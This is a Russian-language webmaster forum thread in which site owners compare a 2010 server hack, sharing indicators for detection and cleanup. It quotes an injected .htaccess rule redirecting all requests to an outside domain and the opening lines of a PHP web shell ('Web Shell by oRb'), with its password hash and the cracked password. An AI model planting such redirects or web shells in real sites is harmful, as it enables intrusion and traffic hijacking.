С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
 Добавлено: 09/08/10 в 13:49 |
На сервере в корне всех сайтов появился .htaccess там где его небыло, где был его переписали новым
RewriteEngine On
RewriteBase /
RewriteRule ^(.? http://ORALEK.COM/r.php
все запросы редиректяться на антиспайварь, о результатах расследования отпишу
|
|
|
|
| |
С нами с 25.01.07
Сообщения: 2669
Рейтинг: 3470
|
| Добавлено: 09/08/10 в 13:55 |
было тоже самое 1 августа
поменяли .htaccess и залили шелл с названием файла confg.php
файл начинается со строк
| Код: [развернуть] | <?php # Web Shell by oRb
$auth_pass = "70b84434a4b0ee2fa95f928f4d6310cd";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = false;
$default_charset = 'Windows-1251'; |
сделай поиск по серверу может его тоже найдешь
|
|
|
|
| |
С нами с 25.01.07
Сообщения: 2669
Рейтинг: 3470
|
| Добавлено: 09/08/10 в 13:57 |
ps. пасс 70b84434a4b0ee2fa95f928f4d6310cd это krevedko
|
|
|
|
| |
С нами с 19.11.07
Сообщения: 507
Рейтинг: 392
|
| Добавлено: 09/08/10 в 14:02 |
почему бы не написать где ваши сервера расположены ?
|
|
|
|
| |
С нами с 02.07.04
Сообщения: 1455
Рейтинг: 1330
|
| Добавлено: 09/08/10 в 15:39 |
Какую дыру использовали известно? Кто хостер?
|
|
|
|
| |
С нами с 15.12.05
Сообщения: 287
Рейтинг: 293
|
| Добавлено: 09/08/10 в 17:06 |
Toxa, FriMan
какую связку скриптов используете в сиджах?
|
|
|
|
| |
С нами с 25.01.07
Сообщения: 2669
Рейтинг: 3470
|
| Добавлено: 09/08/10 в 17:40 |
хостинг supphosting
у меня был взломан только один сайт, на нем были файлы от старого Comust Thumbs, думаю через него, уже снес ессно его
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 10/08/10 в 01:14 |
у меня ломанули через дыру в phpMyAdmin хостер проапгрейдил всё, оперативно провёл расследование
з,Ы fedora-hosting, скрипты были стрим+ат3 и самописный с at3, на ат3 везде стояла защита по ИП
Последний раз редактировалось: weely6 (10/08/10 в 02:01), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 10/08/10 в 01:24 |
за вебшел спасибо
действительно лежит в одном домене это гавно
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 10/08/10 в 01:54 |
после того как удалил все htaccess и отписал хостеру, пришёл ответ что дыра устранена, но файлы на сервере появились снова, потом почитал тему удалил вебшелл надеюсь что это окончательно решит проблему
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
